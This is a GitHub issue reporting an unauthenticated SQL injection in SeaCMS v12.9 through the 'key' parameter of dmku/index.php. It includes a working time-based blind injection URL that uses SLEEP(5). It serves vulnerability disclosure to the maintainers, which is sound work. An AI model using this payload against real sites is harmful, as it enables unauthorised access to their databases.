seacms-net / CMS

海洋cms程序发布
https://www.seacms.net
371 stars 23 forks source link

Unauthenticated SQL Injection in SeaCMS v12.9 #16

Open Tddddddddd opened 1 month ago

Tddddddddd commented 1 month ago

Summary SeaCMS v12.9 suffers from an unauthenticated SQL injection vulnerability in the dmku/index.php file where user-supplied data is used directly in an SQL query without proper sanitization. No filtering found in source code image Proof of Concept (PoC) http(s)://ip:port//js/player/dmplayer/dmku/?ac=so&key=1&type=list 微信图片_20240611101737 http(s)://ip:port//js/player/dmplayer/dmku/?ac=so&key=1' AND (SELECT 1806 FROM (SELECT(SLEEP(5)))npVX)-- OXgJ&type=list image Impact This vulnerability allows unauthenticated remote attackers to inject arbitrary SQL commands through the "key" parameter.